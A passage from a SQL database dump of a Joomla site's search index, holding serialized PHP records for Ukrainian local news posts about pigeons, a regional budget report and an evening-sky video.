"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:27:\"Адана турецька\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:33:\"2540:moya-para-podarok-vid-oblako\";s:7:\"catslug\";s:18:\"137:adana-turetska\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:56:\"/holuby/adana-turetska/2540-moya-para-podarok-vid-oblako\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:27:\"Адана турецька\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:27:\"Адана турецька\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2540\";s:5:\"route\";s:88:\"index.php?option=com_content&view=article&id=2540:moya-para-podarok-vid-oblako&catid=137\";s:5:\"title\";s:46:\"Моя пара - подарок від OBLAKO\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2022-01-04 12:17:45\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2022-01-04 12:17:45\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4949,'index.php?option=com_content&view=article&id=2541','index.php?option=com_content&view=article&id=2541:turetska-adana&catid=137','Турецька адана',' ','2022-01-04 19:35:18','36c950bc4e412fa648a424b5d3ef0438',1,1,1,'*','2022-01-04 17:35:18','0000-00-00 00:00:00','2022-01-04 17:35:18','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2541\";s:5:\"alias\";s:14:\"turetska-adana\";s:7:\"summary\";s:325:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/RLy91rdbHTo\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"137\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2022-01-04 17:35:18\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:27:\"Адана турецька\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:19:\"2541:turetska-adana\";s:7:\"catslug\";s:18:\"137:adana-turetska\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:42:\"/holuby/adana-turetska/2541-turetska-adana\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:27:\"Адана турецька\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:27:\"Адана турецька\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2541\";s:5:\"route\";s:74:\"index.php?option=com_content&view=article&id=2541:turetska-adana&catid=137\";s:5:\"title\";s:27:\"Турецька адана\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2022-01-04 17:35:18\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2022-01-04 17:35:18\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4951,'index.php?option=com_content&view=article&id=2542','index.php?option=com_content&view=article&id=2542:vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-2021-rik&catid=8','Виконання дохідної частини бюджетів ОТГ Житомирської області за 2021 рік',' За даними Департамента фінансів Житомирської ОДА ','2022-01-17 15:45:27','21605f212983d8c8ffae0fc85bc22557',1,1,1,'*','2022-01-17 13:45:27','0000-00-00 00:00:00','2022-01-17 13:45:27','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2542\";s:5:\"alias\";s:79:\"vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-2021-rik\";s:7:\"summary\";s:301:\"<p style=\"text-align: left;\">За даними Департамента фінансів Житомирської ОДА</p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/unnamed.jpg\"><img src=\"https://malehus.in.ua/images/stories/unnamed.jpg\" alt=\"\" class=\"fr-fin fr-dib\"></a><br></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2022-01-17 13:45:27\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:84:\"2542:vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-2021-rik\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:96:\"/8-novini-2/2542-vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-2021-rik\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2542\";s:5:\"route\";s:137:\"index.php?option=com_content&view=article&id=2542:vikonannya-dokhidnoji-chastini-byudzhetiv-otg-zhitomirskoji-oblasti-za-2021-rik&catid=8\";s:5:\"title\";s:131:\"Виконання дохідної частини бюджетів ОТГ Житомирської області за 2021 рік\";s:11:\"description\";s:93:\" За даними Департамента фінансів Житомирської ОДА \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2022-01-17 13:45:27\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2022-01-17 13:45:27\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4953,'index.php?option=com_content&view=article&id=2544','index.php?option=com_content&view=article&id=2544:vechirne-nebo-nad-malinom&catid=8','Вечірнє небо над Малином',' ','2022-07-24 09:34:00','975bb0ab078b7f765fe0fee00dfbc6a9',1,1,1,'*','2022-07-24 06:44:53','0000-00-00 00:00:00','2022-07-24 06:44:53','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2544\";s:5:\"alias\";s:25:\"vechirne-nebo-nad-malinom\";s:7:\"summary\";s:325:\"<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/b-2V_ckN6xU\" title=\"YouTube video player\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2022-07-24 06:44:53\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:30:\"2544:vechirne-nebo-nad-malinom\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super 